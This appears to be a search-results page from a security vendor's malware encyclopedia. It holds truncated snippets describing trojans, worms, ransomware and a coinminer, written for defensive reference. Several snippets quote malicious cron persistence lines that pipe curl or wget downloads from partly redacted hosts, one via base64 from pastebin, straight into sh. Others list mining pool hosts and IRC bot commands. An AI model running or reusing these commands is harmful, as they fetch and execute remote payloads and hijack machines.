Search
Keyword: usojan.sh.hadglider.d
\shell HKEY_CURRENT_USER\a01\shell\ open HKEY_CURRENT_USER\a01\shell\ open\command HKEY_CURRENT_USER\a01\shell\ runas HKEY_CURRENT_USER\a01\shell\ runas\command HKEY_CURRENT_USER\SH HKEY_CURRENT_USER\SH
Modifications This Trojan modifies the following file(s): /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot /var/spool/mail/{user} - contents replaced with "0" string /var/log/wtmp -
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
/tmp/.vd/sslm.tgz min* {Current Directory}/min* /tmp/min* Process Termination This Trojan terminates the following processes if found running in the affected system's memory: rand rx rd tsm tsm2 haiduc a sparky sh
the server SH <command> - Executes a command ISH <command> - SH, interactive, sends to channel SHD <command> - Executes a psuedo-daemonized command INSTALL <http
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
* * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh Path: /etc/crontab Schedule:
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
.nwf .nwm .nwp .nws .nwv .nx^d .nx__ .nx1 .nx2 .nxc .nxg .nxl .ny .nyf .nzb .o .oa2 .oa3 .oab .oad .oam .oar .oas .ob! .obd .obi .obj .obk .obml .obp .obr .obs .obt .obw .obx .obz .oc3 .oc4 .oc5 .oca
.nws .nx^d .nx__ .nx1 .nx2 .nxc .nxg .nxl .ny .nyf .nzb .o .oa2 .oa3 .oab .oad .oam .oar .oas .obd .obj .obk .obml .obp .obr .obt .obx .obz .oca .occ .ocd .ocdc .oce .ocr .ocs .ocx .od .oda .odb .odc
This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive
'/var/spool/cron/crontabs/'"$USER" Schedule: Every 15 minutes Command: "*/15 * * * * ((wget -q -O- https://pastebin.com/raw/{BLOCKED}tb || curl -fsSL https://pastebin.com/raw/{BLOCKED}tb) | base64 -d) | sh" > cron.d 2>&1
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
/var/spool/cron/root Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh mine.moneropool.com xmr.crypto-pool.fr monerohash.com xmrpool.eu pool.noobxmr.com pool.minexmr.cn xmr.poolto.be
* * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh It blocks all outgoing SSH connections on the following ports: 3333 5555 7777 9999 14444 It modifies the system's HOSTS files to prevent users
\01CAC802\D (Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}
-fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh Path: /var/spool/cron/root Schedule: Every 15 minutes Command: */15 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q